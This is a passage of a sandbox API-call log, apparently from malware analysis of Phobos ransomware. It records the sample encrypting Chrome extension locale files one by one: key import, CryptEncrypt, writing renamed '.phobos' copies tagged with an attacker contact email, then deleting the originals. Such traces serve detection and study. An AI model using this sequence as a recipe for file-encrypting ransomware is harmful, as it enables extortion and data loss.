dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.246] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.246] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.247] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.247] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.247] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x55a3, lpOverlapped=0x0) returned 1 [0164.292] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x55b0, dwBufLen=0x55b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x55b0) returned 1 [0164.292] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x55b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x55b0, lpOverlapped=0x0) returned 1 [0164.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0164.293] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.293] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.293] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.293] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.293] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.293] CloseHandle (hObject=0x138) returned 1 [0164.294] CloseHandle (hObject=0x194) returned 1 [0164.294] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json")) returned 1 [0164.295] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.295] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16747) returned 1 [0164.295] CloseHandle (hObject=0x194) returned 1 [0164.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json")) returned 0x2020 [0164.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.296] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.296] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.296] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.296] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.296] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x416b, lpOverlapped=0x0) returned 1 [0164.762] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4170, dwBufLen=0x4170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4170) returned 1 [0164.763] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4170, lpOverlapped=0x0) returned 1 [0164.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0164.764] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.764] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.764] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.764] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.764] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.764] CloseHandle (hObject=0x194) returned 1 [0164.764] CloseHandle (hObject=0x138) returned 1 [0164.764] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json")) returned 1 [0164.765] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.766] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=22591) returned 1 [0164.766] CloseHandle (hObject=0x138) returned 1 [0164.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json")) returned 0x2020 [0164.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.766] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.766] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.767] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.767] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x583f, lpOverlapped=0x0) returned 1 [0164.808] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5840, dwBufLen=0x5840 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5840) returned 1 [0164.808] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5840, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5840, lpOverlapped=0x0) returned 1 [0164.810] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0164.810] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.810] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.810] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.810] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.810] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.810] CloseHandle (hObject=0x138) returned 1 [0164.810] CloseHandle (hObject=0x194) returned 1 [0164.810] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json")) returned 1 [0164.811] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.812] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16267) returned 1 [0164.812] CloseHandle (hObject=0x194) returned 1 [0164.812] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json")) returned 0x2020 [0164.812] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.812] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.812] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.813] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.813] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.813] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3f8b, lpOverlapped=0x0) returned 1 [0164.916] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f90, dwBufLen=0x3f90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f90) returned 1 [0164.916] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3f90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3f90, lpOverlapped=0x0) returned 1 [0164.917] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0164.917] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.917] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0164.917] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.917] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0164.917] CryptDestroyKey (hKey=0xa327e8) returned 1 [0164.917] CloseHandle (hObject=0x194) returned 1 [0164.917] CloseHandle (hObject=0x138) returned 1 [0164.917] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json")) returned 1 [0164.918] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0164.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.919] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16603) returned 1 [0164.919] CloseHandle (hObject=0x138) returned 1 [0164.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json")) returned 0x2020 [0164.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0164.919] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.919] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0164.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0164.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | 